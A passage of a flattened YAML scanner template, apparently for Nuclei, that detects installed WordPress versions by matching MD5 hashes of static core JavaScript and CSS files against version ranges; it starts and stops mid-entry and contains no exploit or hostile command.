- 4.8.15 - dsl: - - "(\"0687e33e84a860c33a3a885193a6d937\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"55349dce77921ce5ae7b0c66c0ec2e4d\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"2ca8d8977881d5e608aa01c45bac7dce\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"28a8a27aaaf51e9de260514ea7ddf409\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"5fccff0cc3e57ff5bb1436e7a0bc2566\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"8d16f9c2327813d9ebfd04769999eeac\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"a7f7bdc09331cf77b0f7b820eb59f75b\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"3207ef8ba63ea7671e48d937393967e9\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"239ad0ddef90fbac27dd0697a10db8f4\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9109ffc835f229e4cef66bb179a67e0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"5c12dccb796dfc0f9bef9745965cf595\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"4ed19dc7687386bb9c6c172dac61f4c4\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c03f1bc87e730cd0e2e069360f47b82f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"4e3e1ef6029d44a9362f7ea746b87994\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"a3677881601afb0f678c2c207d850799\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"170687433986a4a559fa4f16b1d7c70e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"bfa6a78578b3e436a00cddf75420469a\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"16a432e33da81058ca49c643cae0c318\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0ba79ba4228a86dd0a14a72ddba4a059\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"dec8fc8727389a7b012257960f663dff\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"2890d236e5e44496f045916182f54d0d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2d369dd8ffa89cd6c4d66dbdf6ccd67f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"f3b0e2379715e4ae6d15748d14a6dca1\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"cdfaf4cf4c18580773c4af4fb27ff253\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"91f08b610092a39dc11a5e328f2d215d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"a7f30f0c309921a487640a98569cba90\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"c53c2f4dd23046ce2127477792aecb20\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2b0dd7eecea03b4bdedb94ba622fdb03\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"c6ef74c7ec0704ff4cad3b5ec7bfa055\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"82f6e97da7739bd618e9ae38d681db71\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"22aa1f16fffcd8050495b19e49143bf1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"43e0a7d0496e085696a01339bceef3df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"1c4cddde3c73b3e706b6ad620582daf7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"9331dc818181c1df34cc866c03bec20d\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"8e891f5946c8e1780e362268cb45ec8b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"dcf51763fb4a654e15a4e6e7754ca5d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/react.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"ef752361755a318f70b5a3ae9cb2ed3f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6154303cf1c576b1479a67e73f93ecb8\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"f80458708d0a9701b76d741d35b6722f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"edf56a42bca6b565bf7dfcbd8ffc221a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/react.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"47f592e79ad9ce36525bec84a9ce239f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1427ebb68b9631c7f3b0526cb513aac7\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"f4ea9307973c76798b7a18f1ddfa700f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"bff81f643a904be8a3d144f7a8142c24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-auth-check.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1a6d05f43ff7076b053b1802ecac92c3\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"a209401a035e188aaf75fe3392d48184\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"85752ca8c899aee3297e87479fd51994\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"12808b192ca103549dd90b62be9b144e\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"8d5e06994737d4e3e35fd0688151f55e\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"fed09c9b6be237c0fb4ba5c0468bb7ee\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"04e24483fe78930682a25e79adb99342\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"4c44e4da916e1604d58cdb6c662cf4d9\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"d319d9d88ee8a04ea37abc078e8cf9b8\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"07fbdbde3eec108e5709caa94402475f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3325ebb49ad7b3dc830f93d8e385b255\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"30a8f714d12fb7119a0a6b24c448868d\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"8868ded3f5e30dbaec5dbcb7bc104b0f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"826912016774df9daa3e21c24966ba4c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.min.js" - matchers: - - type: dsl - name: 4.5.3 - 5.5.3 - dsl: - - "(\"7121994eec5320fbe6586463bf9651c2\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"e489bd9969f80e9ba1ca4737179884fe\" == md5(body))" - - type: dsl - name: 3.6 - 4.4.24 - dsl: - - "(\"512b871a2830e44259bc3ce3343afcd0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"79b4956b7ec478ec10244b5e2d33ac7d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-embed-template.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"d6c3fb049f657928eac2cd9c7eef6925\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"ed541cbc74e8e5bb8b8d72160d335ddc\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7d82adbb0596605c1916c47eea233a94\" == md5(body))" - - type: dsl - name: 5.1 - 5.5.3 - dsl: - - "(\"dbd0d1fb592c2e6eb891e7321206518b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b46c7133554eca3ae339ce3a5e45e0ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.js" - matchers: - - type: dsl - name: 4.5.3 - 5.0.11 - dsl: - - "(\"6c57b762589f13ea5b3579ca5e6c369b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"00970611f0ee1cadf746d3770c111dea\" == md5(body))" - - type: dsl - name: 3.6 - 4.4.24 - dsl: - - "(\"90e237d5f01035b958feaf514ef27f7a\" == md5(body))" - - type: dsl - name: 5.1 - 5.5.3 - dsl: - - "(\"351c89ef1b09861916f4f022db000832\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c91800f536bebf3fd9b3f710b174d10d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-embed-template.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"c05d678a8197a72c4a44bf540017278a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fc394778444ed2c5e81d0f8e84f6542e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3391028c0cc005ab1761109496b535e7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"133c315433779bc4804a93c209e7e023\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"dea9c532ff8aba0f1fdf7e27a1c29637\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c3a5dc58ab725e53d26fafb26b5e92e6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/api-request.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"eb5b88948b1755a4bb607c33f63c0096\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"b1ae1aa42eaf4df3fdc59777f5ec7437\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8a0fadfcd419986aede647b929822406\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"fba259bfaa5b79101ee7873cfd8290bf\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"08ae4a1169a18c4dbc57bfaeaa444a3f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b509442d92e813e382d582f90b2203fe\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"5a74de32f6b6dc6e4e6716845a839132\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"cceefa969cbff4bcacfa3a39ff48214c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6918ed92f82a791fdf6a38f726629b56\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"e8a7ffcfde36022642abee85dd4b629c\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"fcf78dfab422bd8cfcb95f716d7e0182\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"db82fc8e7e74da0fd4510ef2f001604b\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"7cb42356da59917aef639d39a31ff6e4\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"242281bf85fdfc3d237f7538719f0af0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9b15c1f9fbc142688edd4d027bb73f4b\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1483e8e2916295845be85876b1419a81\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"47e23f3fd1381204bea0e6925770460b\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"166ff0336201e38114db7bad497d0b12\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6cc944795bebf3d0d0e95a743d89bc15\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/api-request.js" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"8bab6e7977d3198174f6773395f2f570\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"5ec7c2daa2cde305e46eb4fd32c9bc92\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"a09e9e461e42babc0b6fb87ddab313b7\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"df2c6676318b083ca21d83fa24abc463\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"39a2f7bc0f1ec2dfbf473770367b9367\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/data-controls.min.js" - matchers: - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"443383efa01f00f813069ec7346f11a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"922b13d84d5d0f131c343b7685def0ad\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"6cfd451bddd4ce114e4cc3617ea814ea\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d04d238f97bbc53c88d65bfc48b7f095\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e8338db52ac85b7ef7bc0d15bc906a47\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/data-controls.js" - matchers: - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"215fa4db1ef071180a48d29f0dff4d64\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a3758795a5c7a0515f3fcbabe492c41b\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"89f88142f4b2f677d730aff3fc3169ea\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5d11f0b5b980602c219feab70f1a4538\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c33545009a5ab7aa13d75db39e4fb7c3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-post.min.js" - matchers: - - type: dsl - name: 4.7.4 - 4.8.15 - dsl: - - "(\"a92828462403c43b71d05af005db85c3\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"1c76cbbb1460865658523caa86f05cba\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"22853923e49914e8cdf4dbdd4061bd8b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"8650fc123b8fa812ec6fa89c062fb2d9\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3425f7b1fec9b03e0ddbcea73787e5f1\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"cc31e2a9fd4b5eafa00a735d3e20c4c1\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"167e7b26c864699559d930fc5ce72a7a\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"306b49c4726604b273860a46a7a69a96\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.9.33 - dsl: - - "(\"4750da6cb226bcab5cec8cc02fcde273\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"7325a1809985c86395457c6e841e2ab3\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"ec79f4a3d602fc297468ee7db7d8516b\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"582cb222b9cae2de8778686fbd4480ba\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"c9afb166c5182641d222f47fa2bd1c83\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f1d32f222e77a360ff3c62d3a6ee223b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"e693d1b2a22c2cb3ab04dbfb2416c172\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ab9800198ab0358fee9eb0f20f8c439d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"105b6a4bd36ef53c65687b9392ceabad\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"f3c5237e842ca29a5bba89ae4372784f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d10bc18ab7e8a367f41fe3f720c8ff63\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d8205a6571a691fabe5778430bd92715\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"0974d972c691fa8dec8e8612188e1568\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"86922662b6c4570d6536929cc8a014cb\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5663a0bb9d3aa47a519091db0db70dca\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"10b5f68f1fb961fd9d8866675754862d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"5f555fd98462f48870e327d0e833fb9e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"cdafe4406388192aa647e64797366ad0\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"aa4bccbdc1f73b5b7854b11379ac7972\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"607b3440b51d60b6d0954fc07a42b98e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e5ba2c4ebfc7201bab031634a0d9bdae\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"39a3cafa73d891260695fe68356ea308\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"bcfded1af21db1cdd0d49f32ddd77745\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6b148eae4202290641289889a11595bd\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6e41f54aa8a8614768fd20f398856568\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"6165321c05c95b7d947f7bfd79c4126c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4d69c72a6b771829bdebfc72a91312b0\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"457d8351de9ec72ed4cdc16bf8d094ca\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2feabd4422aa451b9dda8249739804d8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4bd5df4898551b110d7a79ef5274d7c5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/image-edit.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.4 - dsl: - - "(\"390732f55dfa7529b5bf612b79cdedbf\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"53286d003e3e19eacc26926f76c0d7df\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"cd559285783b61754b780372f9093f51\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a851d6478c2108a61fbdc74b33f9dcda\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"40c9a1866d7ab4aec2346e02d82f4758\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"df9254c728a075b313345528aa68355b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"0be84285d55ffcf75cc77e8fbd369d38\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"7d425b225fde8dde845621fac4160a6d\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"9bf2c46c35fc9f3c9ef2069137efd686\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"8adcd44ebcd7a868786d8a228ac96a9f\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"8aefd8355be19a71bd7229f9ffb3517f\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"228d2d1f73335261a6ec6e41464cb5a9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"56db71c85951d868ec1242aaec00c37a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"616f8750a3708a6d30de5d0ecbf20eac\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"040ada6c2220f56f7d2d3500b768809a\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"b9fdd6082449100b2d851ba9a2505829\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c423c74409e8b3a5821d6cc46b10bf15\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2730e4cb476c1255c108b23f85699b53\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-gallery.js" - matchers: - - type: dsl - name: 4.7 - 5.0.10 - dsl: - - "(\"d0809048874d234e35abae65dc17710a\" == md5(body))" - - type: dsl - name: 3.8 - 4.6.19 - dsl: - - "(\"7cf21db8661f9201a784f638f77d2b26\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.34 - dsl: - - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.4 - dsl: - - "(\"875c61d7e23f27e63c483f1cfaa4d049\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.2 - dsl: - - "(\"07c7fe13aad9fd0975facf825ecce6b4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"fe92407c916ec408ca14ea3489ea1260\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.6 - dsl: - - "(\"b8fd6328bb26d1bfe5282dff92de14d5\" == md5(body))" - - type: dsl - name: 5.4.3 - 5.4.4 - dsl: - - "(\"cedcad9d0ed2e3791e9e2fddd1c243e8\" == md5(body))" - - type: dsl - name: 5.1.7 - 5.3.6 - dsl: - - "(\"eea2b604309b22751dcca66cc8d632ba\" == md5(body))" - - type: dsl - name: 4.7.19 - 5.0.11 - dsl: - - "(\"dce3af6c5cfec53acfa8de54ba8b2f73\" == md5(body))" - - type: dsl - name: 3.8.35 - 4.6.20 - dsl: - - "(\"5e4d0bdf91b1c228a28c1ec4deb870c6\" == md5(body))" - - type: dsl - name: 3.7.35 - dsl: - - "(\"4be2c115bd13d75efb6ecd8301eeca2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-background.js" - matchers: - - type: dsl - name: 4.7 - 4.8.14 - dsl: - - "(\"f4ceff60e63046245443bc55ee7baba9\" == md5(body))" - - type: dsl - name: 3.8 - 4.6.19 - dsl: - - "(\"f26af7294ee07fb9a0cb88c2a8697623\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.34 - dsl: - - "(\"517aabb873f93a3ce7e5d6fa191bdbb9\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c20d43ed14bb4784a28296e98e174afd\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"f83425a586539ee867b165e4a94a54a8\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f5aa17555ab1dc09cf1ecca75e3e596e\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"2d5c840f364432114e1a5761a910afc5\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.10 - dsl: - - "(\"3e22f2941127d8ca57718fa7de91568b\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.4 - dsl: - - "(\"cc358c331f8258166040ec13020cac1f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.2 - dsl: - - "(\"04587d7b662f46d6098f03252254111f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"97ade5c88a76faf72762519bc30c9a03\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.6 - dsl: - - "(\"a1dfdf155fbb6ba80da54b9972b506a8\" == md5(body))" - - type: dsl - name: 5.4.3 - 5.4.4 - dsl: - - "(\"38cf2f220ca17793ccd71e8d16d8486d\" == md5(body))" - - type: dsl - name: 5.1.7 - 5.3.6 - dsl: - - "(\"f99c35000beb3c31c8d8c50a1a26925d\" == md5(body))" - - type: dsl - name: 4.9.16 - 5.0.11 - dsl: - - "(\"c98d592e5df4a09d8657bc1aa8c89aa9\" == md5(body))" - - type: dsl - name: 4.7.19 - 4.8.15 - dsl: - - "(\"da12e436ee9fb945ec6a8bfee4fff3a7\" == md5(body))" - - type: dsl - name: 3.8.35 - 4.6.20 - dsl: - - "(\"bad20392d17f9d5f65d577deab13b542\" == md5(body))" - - type: dsl - name: 3.7.35 - dsl: - - "(\"be8eec5e57c66879f172eaf9e5ec762b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"c584630c3c2aee6040dc54f78658f380\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"951aff9ce655daa3fa7ef637b9841c9f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"ebb03e951bb87f4aa69a1328da082522\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"d38fe745364acb23d92b278bcdadcc76\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"89daaa512ec64685e43a7b8dc027e6b6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7948197f62adb44f10885de01cb569ec\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"a50a5f7469bc374bdf17a75c0cd4d98a\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"9007b591cde52e133de6a54490a4ea59\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b19b342c0b7e49d869254590e4b0df5b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"59443d279888d73242396855314096a3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b61f8a2c808b097aadd14c601d17f3c1\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"4e754876049026025970fb07ee03af3e\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"49dc5b57b14ad1232a5ffb37d96370d3\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"2044a08452b145970ba8155e0f1e00fe\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"8a3d576259af5b0327177c43f63c3232\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"f27f6e413858324dfb9751a089df550d\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"6e3aa443bc42227ce7afee73b8bb90ee\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"299f723fb54eaae381bc49b4a1712784\" == 